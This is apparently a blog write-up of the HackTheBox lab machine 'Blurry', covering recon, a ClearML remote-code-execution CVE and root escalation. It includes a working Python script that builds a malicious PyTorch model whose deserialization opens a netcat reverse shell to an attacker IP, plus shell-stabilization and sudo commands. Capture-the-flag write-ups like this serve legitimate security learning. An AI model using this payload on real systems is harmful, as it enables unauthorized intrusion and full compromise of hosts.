Search

SearchSearch

Blurry

Nov 15, 20242 min read

Reconnaissance

First, I added the new host to my known ones:

sudo echo "10.10.11.19 blurry.htb" | sudo tee -a /etc/hosts

Then I performed an Nmap scan:

nmap -sC -T4 -p- blurry.htb > sC.txt
 
[redacted]
PORT   STATE SERVICE
22/tcp open  ssh
| ssh-hostkey: 
|   3072 3e:21:d5:dc:2e:61:eb:8f:a6:3b:24:2a:b7:1c:05:d3 (RSA)
|   256 39:11:42:3f:0c:25:00:08:d7:2f:1b:51:e0:43:9d:85 (ECDSA)
|_  256 b0:6f:a0:0a:9e:df:b1:7a:49:78:86:b2:35:40:ec:95 (ED25519)
80/tcp open  http
|_http-title: ClearML

As seen, a redirect is done to app.blurry.htb, so I added to the hosts file. Afterwards I decided to take a look at the webpage:

Weaponization

I decided to search for โ€œClearML cveโ€ on the Internet and found the following RCE: CVE-2024-24590

Exploitation

First, I logged in as gitblanc, and look up for projects. I noticed a project called Black Swan:

  • I installed ClearML on terminal with: sudo pip install clearml
  • Then I ran the ClearML setup script: clearml-init
  • I generated new credentials for configuration:

  • I got some errors related to subdomain api.blurry.htb and files.blurry.htb, so I added the new domains.

Weโ€™ve got a reverse shell :D

Stabilize it with:

python3 -c "import pty; pty.spawn('/bin/bash')"
# then
export TERM=xterm
# Press -> Ctrl + Z
stty raw -echo; fg

Weโ€™ve got user flag :D

Privilege Escalation

Iโ€™ll upload linpeas and run it:

If we run sudo -l:

So I investigated a bit and found this script to gain root privileges by generating a malicious model pytorch-script

  • I had to install torch: sudo pip3 install torch
# generate_model.py
import torch
import torch.nn as nn
import os
 
class EvilModel(nn.Module):
	def __init__(self):
		super(EvilModel, self).__init__()
		self.dense = nn.Linear(10, 50)
	
	def forward(self, evil):
		return self.dense(evil)
	
	def __reduce__(self):
		# Inject OS command.
		cmd = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.146 777 >/tmp/f"
		return os.system, (cmd,)
 
# Save the model
evil_model = EvilModel()
torch.save(evil_model, 'evil.pth')

I executed the previous script on my machine, and uploaded โ€˜evil.pthโ€™ to the victim machine. Then I moved it to /modules and executed:

sudo -u root /usr/bin/evaluate_model /models/evil.pth

We are root now and got root flag!

Machine pwned

Graph View

Backlinks

  • No backlinks found